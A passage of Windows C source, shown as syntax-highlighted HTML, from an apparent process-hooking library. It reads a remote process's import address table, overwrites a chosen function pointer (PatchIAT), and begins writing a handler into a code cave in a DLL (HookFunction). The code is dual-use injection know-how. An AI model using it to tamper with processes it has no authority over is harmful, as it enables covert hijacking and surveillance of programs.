<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bSuccess</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">MEM_ALLOC_FAIL_CODE</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">lpFunctionNameBuf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pImageImportByName</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_IMPORT_BY_NAME</span><span class="p">)</span><span class="n">lpFunctionNameBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\t</span><span class="s">%s: 0x%x : 0x%x"</span><span class="p">,</span><span class="w"> </span><span class="n">pImageImportByName</span><span class="o">-></span><span class="n">Name</span><span class="p">,</span><span class="w"></span>
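<span class="w"> </span><span class="n">ThunkDataIAT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">Function</span><span class="p">,</span><span class="w"> </span><span class="n">functionOffset</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">lpFunctionNameBuf</span><span class="p">);</span><span class="w"> </span><span class="c1">// release the name buffer allocated for this entry</span>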
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">functionOffset</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">PVOID</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">counter</span><span class="o">++</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"</span><span class="se">\n\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">++</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* We can free up now the allocated buffer */</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">TRUE</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="cm">/* </span>
<span class="cm"> * Looks up the IAT entry for funcName imported from libName and patches</span>
<span class="cm"> * the function pointer to redirectionAddress. On success, it returns the</span>
<span class="cm"> * OLD function pointer, so you can save it to restore the default behaviour.</span>
<span class="cm"> * If PatchIAT fails, it returns FALSE (0).</span>
<span class="cm"> */</span><span class="w"></span>
<span class="n">DWORD</span><span class="w"> </span><span class="nf">PatchIAT</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">PIMAGE_DATA_DIRECTORY</span><span class="w"> </span><span class="n">imageImportDirectory</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">imageBase</span><span class="p">,</span><span class="w"> </span><span class="n">LPCTSTR</span><span class="w"> </span><span class="n">libName</span><span class="p">,</span><span class="w"> </span><span class="n">LPCTSTR</span><span class="w"> </span><span class="n">funcName</span><span class="p">,</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">redirectionAddress</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">PCHAR</span><span class="w"> </span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">dllNameBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PCHAR</span><span class="w"> </span><span class="n">lpFunctionNameBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_IMPORT_DESCRIPTOR</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">IMAGE_THUNK_DATA</span><span class="w"> </span><span class="n">ThunkDataINT</span><span class="p">,</span><span class="w"> </span><span class="n">ThunkDataIAT</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_IMPORT_BY_NAME</span><span class="w"> </span><span class="n">pImageImportByName</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">functionOffset</span><span class="p">,</span><span class="w"> </span><span class="n">firstRVA</span><span class="p">,</span><span class="w"> </span><span class="n">counter</span><span class="p">,</span><span class="w"> </span><span class="n">functionMemValue</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">firstRVA</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">functionMemValue</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RetReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">buf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">imageImportDirectory</span><span class="o">-></span><span class="n">VirtualAddress</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="mi">50</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_IMPORT_DESCRIPTOR</span><span class="p">)</span><span class="w"> </span><span class="c1">// assumes the module imports fewer than 50 DLLs :)</span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory(buf) in PatchIAT() failed with %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bSuccess</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">MEM_ALLOC_FAIL_CODE</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_IMPORT_DESCRIPTOR</span><span class="p">)</span><span class="n">buf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* </span>
<span class="cm"> * pImageImportDescriptor[index].Characteristics is </span>
<span class="cm"> * set to 0 to indicate the end of the array of IMAGE_IMPORT_DESCRIPTORs.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">Characteristics</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Read the memory of the DLLName:) */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RetReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">dllNameBuf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">Name</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="n">BUFFER_SIZE_SMALL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory(dllNameBuf) in PatchIAT() failed with %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bSuccess</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">MEM_ALLOC_FAIL_CODE</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">dllNameBuf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">functionOffset</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">FirstThunk</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">counter</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="w"> </span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Read the memory of the INT thunk table element :) */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">OriginalFirstThunk</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">counter</span><span class="o">*</span><span class="k">sizeof</span><span class="p">(</span><span class="n">PVOID</span><span class="p">)),</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">ThunkDataINT</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_THUNK_DATA</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"ReadProcessMemory(ThunkDataINT) in PatchIAT() failed with %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Read the memory of the IAT thunk table element :) */</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">-></span><span class="n">FirstThunk</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">counter</span><span class="o">*</span><span class="k">sizeof</span><span class="p">(</span><span class="n">PVOID</span><span class="p">)),</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">ThunkDataIAT</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">IMAGE_THUNK_DATA</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="nb">NULL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"ReadProcessMemory(ThunkDataIAT) in PatchIAT() failed with %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Check if we reached the end of the array */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">&&</span><span class="w"> </span><span class="n">ThunkDataIAT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">Function</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">counter</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">firstRVA</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* </span>
<span class="cm"> * Huge problem here is that the RVAs pointing to the function names in the INT</span>
<span class="cm"> * are not in ascending order. The RVAs may even be broken (yeah the linkers are bad^^)</span>
<span class="cm"> * and we may get invalid indices. How can we figure out that we do have a valid RVA in</span>
<span class="cm"> * ThunkDataINT.u1.AddressOfData ?!</span>
<span class="cm"> * There are just bad solutions (or laziness when it comes to heuristic fine tuning),</span>
<span class="cm"> * so we apply a heuristic to all RVAs of the IMAGE_THUNK_DATA INT array: ignore any RVA</span>
<span class="cm"> * whose absolute difference from the first RVA is more than 0x5000 bytes.</span>
<span class="cm"> * What happens if the first RVA is an invalid one? We're screwed, but at least the</span>
<span class="cm"> * user is able to locate the problem quickly.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="w"> </span><span class="c1">// test if we stumbled upon a suspicious RVA (after hoping that the first is not :/)</span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">abs</span><span class="p">(</span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">firstRVA</span><span class="p">)</span><span class="w"> </span><span class="o">></span><span class="w"> </span><span class="mh">0x5000</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"</span><span class="se">\n</span><span class="s">RVA in INT->u1.AddressOfData might be broken (%x) - ignoring</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RetReadProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="o">&</span><span class="n">lpFunctionNameBuf</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">PVOID</span><span class="p">)(</span><span class="n">imageBase</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">ThunkDataINT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">AddressOfData</span><span class="p">),</span><span class="w"></span>
<span class="w"> </span><span class="n">BUFFER_SIZE_SMALL</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetReadProcessMemory(lpFunctionNameBuf) in PatchIAT() failed with %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bSuccess</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">MEM_ALLOC_FAIL_CODE</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">lpFunctionNameBuf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pImageImportByName</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">PIMAGE_IMPORT_BY_NAME</span><span class="p">)</span><span class="n">lpFunctionNameBuf</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* When we have found the desired IAT entry, we write the new value of the function pointer into the process */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">_stricmp</span><span class="p">(</span><span class="n">pImageImportByName</span><span class="o">-></span><span class="n">Name</span><span class="p">,</span><span class="w"> </span><span class="n">funcName</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="w"> </span><span class="o">&&</span><span class="w"></span>
<span class="w"> </span><span class="n">_stricmp</span><span class="p">(</span><span class="n">dllNameBuf</span><span class="p">,</span><span class="w"> </span><span class="n">libName</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="w"></span>
<span class="w"> </span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">functionMemValue</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ThunkDataIAT</span><span class="p">.</span><span class="n">u1</span><span class="p">.</span><span class="n">Function</span><span class="p">;</span><span class="w"> </span><span class="cm">/* save because the struct will be freed up*/</span><span class="w"></span>
<span class="w"> </span><span class="n">bSuccess</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">RetWriteProcessMemory</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="w"></span>
<span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">LPVOID</span><span class="p">)</span><span class="n">functionOffset</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">LPCVOID</span><span class="p">)</span><span class="o">&</span><span class="n">redirectionAddress</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="p">(</span><span class="n">SIZE_T</span><span class="p">)</span><span class="k">sizeof</span><span class="p">(</span><span class="n">redirectionAddress</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="o">!</span><span class="n">bSuccess</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"RetWriteProcessMemory() in PatchIAT() failed with %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">GetLastError</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">bSuccess</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="n">MEM_ALLOC_FAIL_CODE</span><span class="p">)</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">lpFunctionNameBuf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">FALSE</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stdout</span><span class="p">,</span><span class="w"> </span><span class="s">"[i] Patched the IAT API %s in DLL %s at address 0x%x :)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">pImageImportByName</span><span class="o">-></span><span class="n">Name</span><span class="p">,</span><span class="w"> </span><span class="n">dllNameBuf</span><span class="p">,</span><span class="w"> </span><span class="n">functionOffset</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"> </span><span class="cm">/* break the while loop because we updated the IAT*/</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">functionOffset</span><span class="w"> </span><span class="o">+=</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">PVOID</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">counter</span><span class="o">++</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Have we just processed the searched DLL? Assumes that DLL names in the import directory are unique */</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">_stricmp</span><span class="p">(</span><span class="n">dllNameBuf</span><span class="p">,</span><span class="w"> </span><span class="n">libName</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="c1">//free(&dllNameBuf);</span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">pImageImportDescriptor</span><span class="o">++</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* We can free up now the allocated buffer */</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">buf</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="n">functionMemValue</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="c1">// =============================================================================================</span>
<span class="cm">/*</span>
<span class="cm"> * Does the actual hooking. Finds a code cave in the .text section of the </span>
<span class="cm"> * DLL which exports the function specified by funcName. It writes the handler into</span>
<span class="cm"> * the code cave. The sanity of the handler is not a problem of this library.</span>
<span class="cm"> */</span><span class="w"></span>
<span class="n">HOOK_CONTEXT</span><span class="w"> </span><span class="o">*</span><span class="w"></span>
<span class="nf">HookFunction</span><span class="p">(</span><span class="n">HANDLE</span><span class="w"> </span><span class="n">hProcess</span><span class="p">,</span><span class="w"> </span><span class="n">LPCTSTR</span><span class="w"> </span><span class="n">libName</span><span class="p">,</span><span class="w"> </span><span class="n">LPCTSTR</span><span class="w"> </span><span class="n">funcName</span><span class="p">,</span><span class="w"> </span><span class="n">PVOID</span><span class="w"> </span><span class="n">handlerBuf</span><span class="p">,</span><span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">handlerSize</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">DWORD</span><span class="w"> </span><span class="n">pPEP</span><span class="p">,</span><span class="w"> </span><span class="n">oldFunctionPointer</span><span class="p">,</span><span class="w"> </span><span class="n">pHandler</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">SIZE_T</span><span class="w"> </span><span class="n">nBytesWritten</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">PIMAGE_DATA_DIRECTORY</span><span class="w"> </span><span class="n">imageImportDirectory</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">BOOL</span><span class="w"> </span><span class="n">bSuccess</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">HOOK_CONTEXT</span><span class="w"> </span><span class="o">*</span><span class="n">pHookContext</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">pHookContext</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">malloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="n">HOOK_CONTEXT</span><span class="p">));</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pHookContext</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"malloc in HookFunction() failed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="cm">/* Locate the Process Environment Block */</span><span class="w"></span>
<span class="w"> </span><span class="n">pPEP</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">FindRemotePEB</span><span class="p">(</span><span class="n">hProcess</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">pPEP</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span><span class="w"> </span><span class="s">"[!] FindRemotePEB() failed...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
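<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">pHookContext</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>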
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"[i] Remote PEB found: 0x%x. ImageBase address is 0x%x</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"></span>
<span class="w"> </span><span class="n">pPEP</span><span class="p">,</span><span class="w"> </span><span class="p">(</span><span class="n">DWORD</span><span class="p">)((</span><span class="n">PPEB</span><span class="p">)</span><span class="n">pPEP</span><span class="p">)</span><span class="o">-></span><span class="n">ImageBaseAddress</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
